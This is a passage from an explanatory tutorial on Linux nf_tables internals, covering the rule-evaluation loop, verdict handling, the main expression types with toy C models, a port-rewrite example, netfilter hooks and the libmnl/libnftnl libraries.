			/* if the code is anything but continue, stop going through the expressions in that rule */
			if (regs.verdict.code != NFT_CONTINUE) 
				break;
		}

		/* section where it makes decisions what to do based on verdict */
		switch (regs.verdict.code) { 
		case NFT_BREAK: 
			// if NFT_BREAK -> set verdict back to continue and continue
			// with the next rule on the chain
			// NFT_BREAK just stops execution of the expressions in one rule
			// and skips the rest of the expressions in the rule
			// after that it continues down the rules normally as if NFT_CONTINUE
			regs.verdict.code = NFT_CONTINUE;
			nft_trace_copy_nftrace(pkt, &info);
			continue;
		case NFT_CONTINUE:
			// if we hit this that means we went through all the expressions
			// if NFT_CONTINUE -> we successfully went through the expressions 
			// in the rule and we can continue to the next rule
			nft_trace_packet(pkt, &info, chain, rule,
					 NFT_TRACETYPE_RULE);
			continue;
		}
		/* If not NFT_BREAK and not NFT_CONTINUE we know we will be exiting the chain */
		/* no more rules will be checked in that chain */
		break;
	}

	nft_trace_verdict(&info, chain, rule, &regs);

	/* We hit the switches below after we finish with a chain */
	/* could be through a graceful exit or through a verdict prematurely set */
	switch (regs.verdict.code & NF_VERDICT_MASK) {
	case NF_ACCEPT:
	case NF_DROP:
	case NF_QUEUE:
	case NF_STOLEN:
		// if NF_ACCEPT, NF_DROP, NF_QUEUE or NF_STOLEN we just exit the function
		// returning the verdict to the caller 
		return regs.verdict.code;
	}

	/* This switch is responsible for the -control flow- */
	/* It determines through the verdict what to do with the execution */
	/* Here JUMPs and GOTOs are performed */
	switch (regs.verdict.code) {
	case NFT_JUMP: 
		/* If NFT_JUMP we just set up stuff for a jump - expecting to return */
		if (WARN_ON_ONCE(stackptr >= NFT_JUMP_STACK_SIZE))
			return NF_DROP;
		jumpstack[stackptr].chain = chain;
		jumpstack[stackptr].rule = nft_rule_next(rule);
		jumpstack[stackptr].last_rule = last_rule;
		stackptr++;
		fallthrough;
	case NFT_GOTO:
		/* If NFT_GOTO we just goto the other chain - not expecting to return */
		// the previous case falls through to this one to perform the jump to another chain
		// while NFT_GOTO skips the preparation because it won't be returning to this chain
		chain = regs.verdict.chain;
		goto do_chain;
	case NFT_CONTINUE: // if gone through the rules with no other verdict
	case NFT_RETURN: // if returned from a chain early
		/* If the case is NFT_CONTINUE or NFT_RETURN */
		/* work with that chain is finished */
		break;
	default:
		WARN_ON_ONCE(1);
	}

	/* ... the jump-stack unwinding that resumes the calling chain is omitted here ... */
	return nft_base_chain(basechain)->policy;
}
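Stripped of tracing, generations and jumps, the core loop can be modelled in a few lines of userspace C. The following is a toy sketch, not kernel code: every type and function name in it (toy_do_chain, toy_rule, the toy_expr_* functions) is made up for the illustration, and the verdict values are arbitrary. It only tries to capture the NFT_BREAK / NFT_CONTINUE behaviour described in the comments above.

```c
#include <assert.h>
#include <stddef.h>

/* Toy verdict codes; the numeric values are arbitrary for this sketch. */
enum toy_verdict { TOY_CONTINUE, TOY_BREAK, TOY_DROP, TOY_ACCEPT };

struct toy_regs {
	enum toy_verdict verdict;
	unsigned int data[4];
};

/* An expression reads/writes the registers and may set a verdict. */
typedef void (*toy_expr_fn)(struct toy_regs *regs);

struct toy_rule {
	const toy_expr_fn *exprs;
	size_t nexprs;
};

/* Walks the rules of one chain; returns the policy if no rule decides. */
enum toy_verdict toy_do_chain(const struct toy_rule *rules, size_t nrules,
			      struct toy_regs *regs, enum toy_verdict policy)
{
	assert(rules != NULL && regs != NULL);

	regs->verdict = TOY_CONTINUE;
	for (size_t r = 0; r < nrules; r++) {
		for (size_t e = 0; e < rules[r].nexprs; e++) {
			rules[r].exprs[e](regs);
			if (regs->verdict != TOY_CONTINUE)
				break; /* skip the rest of this rule */
		}
		if (regs->verdict == TOY_BREAK) {
			regs->verdict = TOY_CONTINUE; /* move on to the next rule */
			continue;
		}
		if (regs->verdict == TOY_CONTINUE)
			continue;
		return regs->verdict; /* DROP / ACCEPT ends the chain */
	}
	return policy;
}

/* Example expressions: pretend the packet's destination port is 50001. */
void toy_expr_load_port(struct toy_regs *regs) { regs->data[0] = 50001; }

void toy_expr_port_is_80(struct toy_regs *regs)
{
	if (regs->data[0] != 80)
		regs->verdict = TOY_BREAK;
}

void toy_expr_port_is_50001(struct toy_regs *regs)
{
	if (regs->data[0] != 50001)
		regs->verdict = TOY_BREAK;
}

void toy_expr_drop(struct toy_regs *regs) { regs->verdict = TOY_DROP; }
```

A chain made of the rules "load port, port is 80, drop" and "load port, port is 50001, drop" returns TOY_DROP: the first rule breaks out at the comparison and the second one matches. With only the first rule in the chain, the drop expression is never reached and the policy is returned instead.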


The Expressions 
As we said expressions perform some action on packets or registers.

An important thing to talk about is the operations and structure of expressions.
static const struct nft_expr_ops nft_imm_ops = {
	.type		= &nft_imm_type, // the expression type
	.size		= NFT_EXPR_SIZE(sizeof(struct nft_immediate_expr)),
	.eval		= nft_immediate_eval, // called when the expression is 'run'
	.init		= nft_immediate_init, // called when added with a rule
	.activate	= nft_immediate_activate,
	.deactivate	= nft_immediate_deactivate,
	.destroy	= nft_immediate_destroy,
	.dump		= nft_immediate_dump,
	.validate	= nft_immediate_validate,
	.reduce		= nft_immediate_reduce,
	.offload	= nft_immediate_offload,
	.offload_action	= nft_immediate_offload_action,
};

Every time a rule is added, the init function of each of its expressions is called to make sure the data passed to the expression is valid. Whenever an expression is run, its eval function is called - the function that actually performs the expression. And so on and so forth.

This is how each expression is defined in the codebase.
Let’s take a look at the most commonly used expressions and explain how they can be used.

nft_immediate_expr 
This expression is probably the simplest one. It takes constant data and puts it into the registers. That’s all it does.
It is most often used to set the verdict register.
struct nft_immediate_expr {
	struct nft_data		data;
	u8			dreg;
	u8			dlen;
};

It needs a dreg - a destination register and a dlen - the destination length. The first parameter dreg is the offset at which the data is going to be written. The second parameter dlen just shows the length of the data being written.

The constant data is passed in the parameter data, which is of type struct nft_data.
/* include/net/netfilter/nf_tables.h */
struct nft_data {
	union {
		u32			data[4];
		struct nft_verdict	verdict;
	};
} __attribute__((aligned(__alignof__(u64))));

We can see that nft_data can hold either a verdict or 16 bytes of data.
So with nft_immediate_expr we can set a verdict or write up to 16 bytes of arbitrary data to the registers.
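In userspace terms, evaluating an immediate expression boils down to a bounded copy. The sketch below is a simplified model, not the kernel implementation: toy_immediate and toy_immediate_eval are hypothetical names, and for simplicity dreg is treated here as a plain byte offset into an 80-byte register buffer.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define TOY_REG_BYTES 80 /* 16-byte verdict + 64 bytes of data registers */

/* Hypothetical, simplified model of an immediate expression. */
struct toy_immediate {
	uint8_t data[16]; /* the constant, at most 16 bytes */
	uint8_t dreg;     /* destination, as a byte offset (assumption) */
	uint8_t dlen;     /* number of bytes to write */
};

/* Copies the constant into the register buffer; returns 0 on success. */
int toy_immediate_eval(const struct toy_immediate *imm,
		       uint8_t regs[TOY_REG_BYTES])
{
	assert(imm != NULL && regs != NULL);

	/* Reject writes that would not fit; this toy checks at eval time. */
	if (imm->dlen > sizeof(imm->data))
		return -1;
	if ((size_t)imm->dreg + imm->dlen > TOY_REG_BYTES)
		return -1;

	memcpy(regs + imm->dreg, imm->data, imm->dlen);
	return 0;
}
```

Writing 4 bytes at offset 16 fills the first 4-byte data register, while a 4-byte write at offset 78 is rejected because it would run past the end of the buffer. Checks of this kind are exactly what the init function of a real expression is there for.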

nft_payload 
This expression is another essential one. It is used to copy from the packets to the registers.
struct nft_payload {
	enum nft_payload_bases	base:8;
	u8			offset;
	u8			len;
	u8			dreg;
};

The first parameter here is a base. The type is enum nft_payload_bases so let us take a look at it.
/* include/uapi/linux/netfilter/nf_tables.h */
/**
 * enum nft_payload_bases - nf_tables payload expression offset bases
 *
 * @NFT_PAYLOAD_LL_HEADER: link layer header
 * @NFT_PAYLOAD_NETWORK_HEADER: network header
 * @NFT_PAYLOAD_TRANSPORT_HEADER: transport header
 * @NFT_PAYLOAD_INNER_HEADER: inner header / payload
 */
enum nft_payload_bases {
	NFT_PAYLOAD_LL_HEADER,
	NFT_PAYLOAD_NETWORK_HEADER,
	NFT_PAYLOAD_TRANSPORT_HEADER,
	NFT_PAYLOAD_INNER_HEADER,
};

So the bases we could use target headers at the different OSI levels. 
The second parameter we have in the nft_payload is offset - it defines the offset at which we start copying from, relative to the base provided. For example, in the UDP header the destination port is at offset 2 bytes from the start of the UDP header. So to copy the destination port we would use the NFT_PAYLOAD_TRANSPORT_HEADER base and offset = 2.
The third parameter we have is the len parameter. It just specifies the amount of bytes we are going to be copying.
The fourth parameter is dreg which specifies to which register we are going to be copying.
So let’s have an example - if we want to copy the TCP checksum to the third small register (small = 4-byte one) we are going to set the values of the expression to:
base = NFT_PAYLOAD_TRANSPORT_HEADER
offset = 16 -> the checksum is 16 bytes away from the start of the TCP header
len = 2 -> the checksum is 2 bytes
dreg = NFT_REG32_02 (the small registers start from NFT_REG32_00)
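The effect of such a payload load can be imitated with a small userspace function. This is a sketch under assumptions: toy_payload_eval is a hypothetical helper, the registers are modelled as twenty 4-byte words (the 80 bytes discussed earlier) and the destination is given as a word index into that array, so NFT_REG32_02 corresponds to word 6 (four words of verdict plus two).

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define TOY_NUM_REG32 20 /* 80 bytes viewed as 4-byte words */

/*
 * Hypothetical helper modelling a payload load: copies len bytes found at
 * hdr + offset into the registers, starting at 4-byte word dreg_word.
 * Returns 0 on success, -1 if the request does not fit.
 */
int toy_payload_eval(uint32_t regs[TOY_NUM_REG32],
		     const uint8_t *hdr, size_t hdr_len,
		     size_t offset, size_t len, size_t dreg_word)
{
	size_t words = (len + 3) / 4; /* registers touched, rounded up */

	assert(regs != NULL && hdr != NULL);

	if (len == 0 || offset > hdr_len || len > hdr_len - offset)
		return -1;
	if (dreg_word >= TOY_NUM_REG32 || words > TOY_NUM_REG32 - dreg_word)
		return -1;

	/* Zero the destination first so a partial last word has no stale bytes. */
	memset(&regs[dreg_word], 0, words * 4);
	memcpy(&regs[dreg_word], hdr + offset, len);
	return 0;
}
```

For the checksum example above the call would use offset 16, len 2 and destination word 6; afterwards the first two bytes of that register hold the checksum and the other two are zero.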


nft_payload_set 
This expression is the opposite of nft_payload. Instead of copying from the headers to the registers, we can use nft_payload_set to copy from the registers to the headers.
/* include/net/netfilter/nf_tables_core.h */
struct nft_payload_set {
	enum nft_payload_bases	base:8;
	u8			offset;
	u8			len;
	u8			sreg;
	u8			csum_type;
	u8			csum_offset;
	u8			csum_flags;
};

We provide a base which specifies what type of header we target (at what OSI level). The offset parameter specifies at what offset we are going to write relative to the beginning of the header and len shows how many bytes we are going to be copying from the registers to the packet. The last essential argument is sreg which holds the register offset from which we are going to copy len bytes.

We also have some optional checksum parameters.
/* include/uapi/linux/netfilter/nf_tables.h */
/**
 * enum nft_payload_csum_types - nf_tables payload expression checksum types
 *
 * @NFT_PAYLOAD_CSUM_NONE: no checksumming
 * @NFT_PAYLOAD_CSUM_INET: internet checksum (RFC 791)
 * @NFT_PAYLOAD_CSUM_SCTP: CRC-32c, for use in SCTP header (RFC 3309)
 */
enum nft_payload_csum_types {
	NFT_PAYLOAD_CSUM_NONE,
	NFT_PAYLOAD_CSUM_INET,
	NFT_PAYLOAD_CSUM_SCTP,
};


This expression allows us to directly modify incoming packets before they reach the application layer, or outgoing ones before they leave the machine. For example, it could be used to redirect packets to different addresses or ports.

nft_cmp_expr 
We are going to take a look at the comparison expression. It can be used to control the flow of the execution of expressions depending on if a condition is met.
struct nft_cmp_expr {
	struct nft_data		data;
	u8			sreg;
	u8			len;
	enum nft_cmp_ops	op:8;
};

The first parameter we have here is data. This is the constant data against which we are going to be comparing. So one of our arguments in the comparison is always constant. The other is defined by sreg and len.

Now we have to take a look at the type of relational operators.
/**
 * enum nft_cmp_ops - nf_tables relational operator
 *
 * @NFT_CMP_EQ: equal
 * @NFT_CMP_NEQ: not equal
 * @NFT_CMP_LT: less than
 * @NFT_CMP_LTE: less than or equal to
 * @NFT_CMP_GT: greater than
 * @NFT_CMP_GTE: greater than or equal to
 */
enum nft_cmp_ops {
	NFT_CMP_EQ,
	NFT_CMP_NEQ,
	NFT_CMP_LT,
	NFT_CMP_LTE,
	NFT_CMP_GT,
	NFT_CMP_GTE,
};

For example if we choose NFT_CMP_LT the comparison is going to be register < data where register is the data we get from sreg (with length len) and data is the constant data that we are providing to the expression.

But what happens if the comparison evaluates to true and what happens if it evaluates to false?
If it evaluates to true, execution continues normally down the expressions in the current rule.
If it evaluates to false, it sets the verdict code to NFT_BREAK, which means that no more expressions will be executed in the current rule, but execution then continues normally with the rest of the rules in the chain.
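The behaviour can be sketched with memcmp. The enum and function names below (cmp_op, cmp_verdict, cmp_eval) are made up for this illustration and only model what was described above. The sketch assumes a plain byte-wise comparison, which means that "less than" and "greater than" are only numerically meaningful when both operands are stored in big-endian (network) byte order.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

enum cmp_op { CMP_EQ, CMP_NEQ, CMP_LT, CMP_LTE, CMP_GT, CMP_GTE };
enum cmp_verdict { CMP_VERDICT_CONTINUE, CMP_VERDICT_BREAK };

/*
 * Hypothetical helper: compares len bytes of register data against the
 * constant and returns the verdict the expression would leave behind.
 */
enum cmp_verdict cmp_eval(enum cmp_op op, const void *reg,
			  const void *constant, size_t len)
{
	int d;
	int match = 0;

	assert(reg != NULL && constant != NULL);

	d = memcmp(reg, constant, len); /* <0, 0 or >0, compared byte-wise */
	switch (op) {
	case CMP_EQ:  match = (d == 0); break;
	case CMP_NEQ: match = (d != 0); break;
	case CMP_LT:  match = (d < 0);  break;
	case CMP_LTE: match = (d <= 0); break;
	case CMP_GT:  match = (d > 0);  break;
	case CMP_GTE: match = (d >= 0); break;
	}

	/* true: keep evaluating the rule; false: skip the rest of the rule */
	return match ? CMP_VERDICT_CONTINUE : CMP_VERDICT_BREAK;
}
```

Comparing port 50001 (bytes c3 51 in network order) against the constant 50009 (c3 59) with the "less than" operator lets the rule continue, while "equal" or "greater than or equal" would break out of it.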

nft_bitwise 
Now we are going to take a look at an expression that performs bitwise operations on the registers.
struct nft_bitwise {
	u8			sreg;
	u8			dreg;
	enum nft_bitwise_ops	op:8;
	u8			len;
	struct nft_data		mask;
	struct nft_data		xor;
	struct nft_data		data;
};

The first obvious parameters are sreg, dreg and len. The parameters sreg and len define which registers the operation is performed on, and dreg defines where the result is put after the bitwise operation has been performed.

Now it is time to take a look at the different bitwise operations.
/**
 * enum nft_bitwise_ops - nf_tables bitwise operations
 *
 * @NFT_BITWISE_BOOL: mask-and-xor operation used to implement NOT, AND, OR and
 *                    XOR boolean operations
 * @NFT_BITWISE_LSHIFT: left-shift operation
 * @NFT_BITWISE_RSHIFT: right-shift operation
 */
enum nft_bitwise_ops {
	NFT_BITWISE_BOOL,
	NFT_BITWISE_LSHIFT,
	NFT_BITWISE_RSHIFT,
};

The parameters mask and xor are set when the operation is NFT_BITWISE_BOOL, i.e. when we want to perform a boolean operation. The data parameter has to be set if the operation is NFT_BITWISE_LSHIFT or NFT_BITWISE_RSHIFT; it holds the amount we want to shift by.
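It may not be obvious how a single mask-and-xor step can implement NOT, AND, OR and XOR, so here is a small sketch. The function names are invented for the illustration; the only thing taken from the header comment above is the primitive itself, (src & mask) ^ xor, applied here to one 32-bit word.

```c
#include <assert.h>
#include <stdint.h>

/* The single primitive behind the boolean mode: (src & mask) ^ xor. */
uint32_t mask_and_xor(uint32_t src, uint32_t mask, uint32_t xor_val)
{
	return (src & mask) ^ xor_val;
}

/* The classic boolean operations expressed through that primitive. */
uint32_t bool_and(uint32_t x, uint32_t c)
{
	return mask_and_xor(x, c, 0);
}

uint32_t bool_or(uint32_t x, uint32_t c)
{
	/* clear the bits of c first, then set them again through the xor */
	return mask_and_xor(x, ~c, c);
}

uint32_t bool_xor(uint32_t x, uint32_t c)
{
	return mask_and_xor(x, 0xffffffffu, c);
}

uint32_t bool_not(uint32_t x)
{
	return mask_and_xor(x, 0xffffffffu, 0xffffffffu);
}

/* Cross-check the identities against the native C operators. */
void bitwise_bool_selfcheck(uint32_t x, uint32_t c)
{
	assert(bool_and(x, c) == (x & c));
	assert(bool_or(x, c) == (x | c));
	assert(bool_xor(x, c) == (x ^ c));
	assert(bool_not(x) == (uint32_t)~x);
}
```

So a userspace program that wants "register OR constant" would pass the inverted constant as mask and the constant itself as xor.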

nft_meta 
This expression allows you to play around with packet metadata.
struct nft_meta {
	enum nft_meta_keys	key:8;
	u8			len;
	union {
		u8		dreg;
		u8		sreg;
	};
};

As you can see it can be used in two ways. The first one is to get the metadata from the packet and write it into the registers - when dreg is used. The other way to use it is to get metadata from the registers and write it to the packet - when sreg is used.
What metadata is going to be manipulated depends on the key being used.
/**
 * enum nft_meta_keys - nf_tables meta expression keys
 *
 * @NFT_META_LEN: packet length (skb->len)
 * @NFT_META_PROTOCOL: packet ethertype protocol (skb->protocol), invalid in OUTPUT
 * @NFT_META_PRIORITY: packet priority (skb->priority)
 * @NFT_META_MARK: packet mark (skb->mark)
 * @NFT_META_IIF: packet input interface index (dev->ifindex)
 * @NFT_META_OIF: packet output interface index (dev->ifindex)
 * @NFT_META_IIFNAME: packet input interface name (dev->name)
 * @NFT_META_OIFNAME: packet output interface name (dev->name)
 * @NFT_META_IIFTYPE: packet input interface type (dev->type)
 * @NFT_META_OIFTYPE: packet output interface type (dev->type)
 * @NFT_META_SKUID: originating socket UID (fsuid)
 * @NFT_META_SKGID: originating socket GID (fsgid)
 * @NFT_META_NFTRACE: packet nftrace bit
 * @NFT_META_RTCLASSID: realm value of packet's route (skb->dst->tclassid)
 * @NFT_META_SECMARK: packet secmark (skb->secmark)
 * @NFT_META_NFPROTO: netfilter protocol
 * @NFT_META_L4PROTO: layer 4 protocol number
 * @NFT_META_BRI_IIFNAME: packet input bridge interface name
 * @NFT_META_BRI_OIFNAME: packet output bridge interface name
 * @NFT_META_PKTTYPE: packet type (skb->pkt_type), special handling for loopback
 * @NFT_META_CPU: cpu id through smp_processor_id()
 * @NFT_META_IIFGROUP: packet input interface group
 * @NFT_META_OIFGROUP: packet output interface group
 * @NFT_META_CGROUP: socket control group (skb->sk->sk_classid)
 * @NFT_META_PRANDOM: a 32bit pseudo-random number
 * @NFT_META_SECPATH: boolean, secpath_exists (!!skb->sp)
 * @NFT_META_IIFKIND: packet input interface kind name (dev->rtnl_link_ops->kind)
 * @NFT_META_OIFKIND: packet output interface kind name (dev->rtnl_link_ops->kind)
 * @NFT_META_BRI_IIFPVID: packet input bridge port pvid
 * @NFT_META_BRI_IIFVPROTO: packet input bridge vlan proto
 * @NFT_META_TIME_NS: time since epoch (in nanoseconds)
 * @NFT_META_TIME_DAY: day of week (from 0 = Sunday to 6 = Saturday)
 * @NFT_META_TIME_HOUR: hour of day (in seconds)
 * @NFT_META_SDIF: slave device interface index
 * @NFT_META_SDIFNAME: slave device interface name
 */

The meta keys are… a lot.

nft_byteorder 
We will now look at a type of expression that can be used to change the endianness of data.
struct nft_byteorder {
	u8			sreg;
	u8			dreg;
	enum nft_byteorder_ops	op:8;
	u8			len;
	u8			size;
};

The essential parameters are sreg, len and dreg that show from what register we get the data that we are going to perform the action on, how big it is and where we are going to put it.
There is an operation parameter op that can hold two values.

/**
 * enum nft_byteorder_ops - nf_tables byteorder operators
 *
 * @NFT_BYTEORDER_NTOH: network to host operator
 * @NFT_BYTEORDER_HTON: host to network operator
 */
enum nft_byteorder_ops {
	NFT_BYTEORDER_NTOH,
	NFT_BYTEORDER_HTON,
};

The first type of operation is network to host where we convert from network endianness (almost always big-endian) to host endianness - whatever that might be (little-endian on the x86 family).
The other type of operation is host to network which is the opposite - converts from host endianness to network.

The last parameter is size. This is the size of the integers where the endianness will be changed. It can take a few discrete values - 2, 4 and 8.
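To make the roles of len, size and op more concrete, here is a minimal user-space sketch of the idea. It is not the kernel code: the function name byteorder_convert and the enum byteorder_op are hypothetical stand-ins, it only handles the 2 and 4 byte sizes, and it assumes len is a multiple of size.

```c
#include <arpa/inet.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-ins for NFT_BYTEORDER_NTOH / NFT_BYTEORDER_HTON. */
enum byteorder_op { OP_NTOH, OP_HTON };

/*
 * Treat the len bytes at src as consecutive integers of `size` bytes each,
 * convert every one of them and store the results at dst.
 * Returns 0 on success, -1 if the size is unsupported by this sketch
 * or len is not a multiple of size.
 */
static int byteorder_convert(uint8_t *dst, const uint8_t *src,
                             size_t len, size_t size, enum byteorder_op op)
{
    size_t i;

    if ((size != 2 && size != 4) || len % size != 0)
        return -1;

    for (i = 0; i < len; i += size) {
        if (size == 2) {
            uint16_t v;

            memcpy(&v, src + i, sizeof(v));
            v = (op == OP_NTOH) ? ntohs(v) : htons(v);
            memcpy(dst + i, &v, sizeof(v));
        } else {
            uint32_t v;

            memcpy(&v, src + i, sizeof(v));
            v = (op == OP_NTOH) ? ntohl(v) : htonl(v);
            memcpy(dst + i, &v, sizeof(v));
        }
    }
    return 0;
}
```

With len = 4 and size = 2, for example, the four bytes are handled as two independent 16-bit integers rather than as one 32-bit integer.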

nft_range_expr 

This expression is similar to the compare expression, but instead of comparing against a constant value it compares against a constant range.
struct nft_range_expr {
	struct nft_data		data_from;
	struct nft_data		data_to;
	u8			sreg;
	u8			len;
	enum nft_range_ops	op:8;
};

The range is defined by data_from and data_to. The parameters sreg and len define the data we are going to be comparing against the range.
The range is inclusive - including the values passed as data_from and data_to.
The last parameter is the operation op.
/**
 * enum nft_range_ops - nf_tables range operator
 *
 * @NFT_RANGE_EQ: equal
 * @NFT_RANGE_NEQ: not equal
 */
enum nft_range_ops {
	NFT_RANGE_EQ,
	NFT_RANGE_NEQ,
};

If the operation is NFT_RANGE_EQ and the data is outside of the range, the verdict is set to NFT_BREAK - the rest of the expressions in the rule are skipped and evaluation continues with the next rule in the chain. If the operation is NFT_RANGE_NEQ, the verdict is set to NFT_BREAK when the data is inside the (inclusive) range.
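The decision described above can be sketched in user space as follows. This is an illustration under assumptions, not the kernel implementation: range_breaks and enum range_op are hypothetical names, and the comparison is a plain byte-wise memcmp, so the values are assumed to be stored in big-endian (network) order for the byte order to match the numeric order.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-ins for NFT_RANGE_EQ / NFT_RANGE_NEQ. */
enum range_op { RANGE_EQ, RANGE_NEQ };

/*
 * Returns true when the expression would set the verdict to NFT_BREAK,
 * i.e. when the remaining expressions of the rule would be skipped.
 * data, from and to are len-byte values in big-endian order.
 */
static bool range_breaks(const uint8_t *data, const uint8_t *from,
                         const uint8_t *to, size_t len, enum range_op op)
{
    int cmp_from = memcmp(data, from, len);
    int cmp_to = memcmp(data, to, len);
    /* Inclusive on both ends: from <= data <= to. */
    bool in_range = cmp_from >= 0 && cmp_to <= 0;

    return (op == RANGE_EQ) ? !in_range : in_range;
}
```

Because both bounds are inclusive, a value equal to data_from or data_to counts as being inside the range.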

Other expressions 
Those are a few of the most commonly used expressions in nf_tables but there are others.
/* include/net/netfilter/nf_tables_core.h */ 
extern struct nft_expr_type nft_counter_type;
extern struct nft_expr_type nft_lookup_type;
extern struct nft_expr_type nft_dynset_type;
extern struct nft_expr_type nft_rt_type;
extern struct nft_expr_type nft_exthdr_type;
extern struct nft_expr_type nft_last_type;
// the ones we talked about are omitted  


An example 
I want to give a quick example of a simple rule and how different expressions might take part in it.

We are going to make a rule that checks if a UDP packet’s destination port is in the range 50001-50009 and if so changes the destination port to 1337.


  
    
Expression	Expression Arguments	Result of expression
nft_payload	base = NFT_PAYLOAD_TRANSPORT_HEADER, offset = 2, len = 2, dreg = NFT_REG32_01	Copies the 2-byte destination port, located at offset 2 from the start of the UDP header, into the 1st register.
nft_range_expr	data_from = (u16) 50001, data_to = (u16) 50009, sreg = NFT_REG32_01, len = 2, op = NFT_RANGE_EQ	Checks if the destination port in the 1st register is in the range 50001-50009. If it isn’t, the verdict is set to NFT_BREAK, skipping the rest of the expressions in the rule. If it is in the range, evaluation continues down the expressions.
nft_immediate_expr	data = (u16) 1337, dreg = NFT_REG32_02, len = 2	Sets the 2nd register to 1337.
nft_payload_set	base = NFT_PAYLOAD_TRANSPORT_HEADER, offset = 2, len = 2, sreg = NFT_REG32_02	Changes the destination port to the value in the 2nd register (1337).
    
  

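The four expressions of this rule can be walked through with a small user-space simulation. This is only a sketch under assumptions: apply_rule is a hypothetical function, the two registers are modelled as local byte arrays, the packet is reduced to a bare 8-byte UDP header, and checksum handling is ignored entirely.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define UDP_DPORT_OFFSET 2 /* destination port offset in the UDP header */
#define UDP_PORT_LEN     2 /* a port is 2 bytes long */

/*
 * Runs the example rule against a UDP header.
 * Returns true if the rule ran to the end (port rewritten),
 * false if the range check "broke" out of the rule.
 */
static bool apply_rule(uint8_t *udp_hdr)
{
    /* All constants are in network (big-endian) byte order. */
    static const uint8_t from[UDP_PORT_LEN] = {0xC3, 0x51};     /* 50001 */
    static const uint8_t to[UDP_PORT_LEN] = {0xC3, 0x59};       /* 50009 */
    static const uint8_t new_port[UDP_PORT_LEN] = {0x05, 0x39}; /* 1337 */
    uint8_t reg1[4] = {0};
    uint8_t reg2[4] = {0};

    /* nft_payload: copy the destination port into the 1st register. */
    memcpy(reg1, udp_hdr + UDP_DPORT_OFFSET, UDP_PORT_LEN);

    /* nft_range_expr (NFT_RANGE_EQ): break if outside 50001-50009. */
    if (memcmp(reg1, from, UDP_PORT_LEN) < 0 ||
        memcmp(reg1, to, UDP_PORT_LEN) > 0)
        return false;

    /* nft_immediate_expr: load 1337 into the 2nd register. */
    memcpy(reg2, new_port, UDP_PORT_LEN);

    /* nft_payload_set: write the 2nd register back into the header. */
    memcpy(udp_hdr + UDP_DPORT_OFFSET, reg2, UDP_PORT_LEN);
    return true;
}
```

A header with destination port 50005 comes out with port 1337, while a header with destination port 53 is left untouched because the range expression stops the rule early.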

However we would ultimately want this rule to be triggered only if the packet is incoming… How do we do that?

This is determined by what hook the chain (where the rule is) uses. So let us take a look at the hooks.

The Hooks 
The netfilter hooks define at what point a chain is going to be executed. Is it going to be when a packet comes into the network? Or is it going to be on its way out?

There are six hooks - ingress, prerouting, input, forward, output, postrouting.
The prerouting and input hooks are triggered by traffic flowing into the network (or the local machine).
The postrouting and output are triggered by traffic flowing out of the network.
If IP forwarding is enabled so your machine can act as a router then the forward hook could also be reached after prerouting.

The last hook is the ingress hook. It is newer than the others (introduced in version 4.2).

The ingress hook is attached to a particular network interface. It can be used to enforce very early filtering policies. The ingress hook is triggered even before the prerouting one. One important detail: at the stage where this hook resides, fragmented datagrams have not been reassembled yet.

So to summarize, the possible paths a packet can take are:

  ingress -> prerouting -> input -> application
  application -> output -> postrouting


And if forwarding is enabled, the possible paths also include:

  ingress -> prerouting -> forward -> postrouting
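The three paths listed above can be condensed into a small decision function. This is a simplified model for illustration only: the enum sim_hook and the function hook_path are hypothetical names, and the model assumes that a packet that is neither for the local machine nor forwardable simply stops after prerouting.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical hook identifiers used only by this sketch. */
enum sim_hook {
    SIM_INGRESS,
    SIM_PREROUTING,
    SIM_INPUT,
    SIM_FORWARD,
    SIM_OUTPUT,
    SIM_POSTROUTING,
};

/*
 * Fills path (capacity of at least 4) with the hooks a packet traverses
 * and returns how many entries were written.
 */
static size_t hook_path(bool locally_generated, bool for_local_host,
                        bool forwarding_enabled, enum sim_hook path[4])
{
    size_t n = 0;

    if (locally_generated) {
        /* application -> output -> postrouting */
        path[n++] = SIM_OUTPUT;
        path[n++] = SIM_POSTROUTING;
        return n;
    }

    /* Every incoming packet starts with ingress and prerouting. */
    path[n++] = SIM_INGRESS;
    path[n++] = SIM_PREROUTING;

    if (for_local_host) {
        /* ... -> input -> application */
        path[n++] = SIM_INPUT;
    } else if (forwarding_enabled) {
        /* ... -> forward -> postrouting */
        path[n++] = SIM_FORWARD;
        path[n++] = SIM_POSTROUTING;
    }
    return n;
}
```

For an incoming packet addressed to another host with forwarding enabled, the function yields ingress, prerouting, forward and postrouting, matching the last path in the list.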


On the nftables wiki a schematic can be found that simplifies stuff a bit.



In the codebase the hooks are defined in the following enum type.
/* include/uapi/linux/netfilter.h */ 

enum nf_inet_hooks {
	NF_INET_PRE_ROUTING,
	NF_INET_LOCAL_IN,
	NF_INET_FORWARD,
	NF_INET_LOCAL_OUT,
	NF_INET_POST_ROUTING,
	NF_INET_NUMHOOKS,
	NF_INET_INGRESS = NF_INET_NUMHOOKS,
};


The Libraries - libmnl and libnftnl 
It is time to take a very quick look at the two libraries that significantly simplify the process of working with nf_tables.

libmnl 

  libmnl is a minimalistic user-space library oriented to Netlink developers. There are a lot of common tasks in parsing, validating, constructing of both the Netlink header and TLVs that are repetitive and easy to get wrong. This library aims to provide simple helpers that allows you to re-use code and to avoid re-inventing the wheel.


This is the description provided in the documentation. In the libmnl repository you will find some examples of how to use the library. While it is not well documented, those examples are enough to understand it to a degree.

libnftnl 
This is a userspace library that essentially provides an API to nf_tables. It is crucial when working with nf_tables. It requires libmnl to function.

In the libnftnl repository you can find a lot of good examples showing you how to use the library. They are more than enough to give you a solid understanding.

In include/linux/netfilter/nf_tables.h in the repository you can find all of the parameter names (and enum values) for all of the expressions. This file is include/uapi/linux/netfilter/nf_tables.h from the kernel tree.

Closing remarks 
Ultimately I hope this article can provide you with a solid understanding of nf_tables. I hope I saved some people precious hours that they would otherwise pour into researching nf_tables.

Credit to David Bouman for his write up that gave me the base knowledge that I needed to take a deeper look and ultimately write this article.
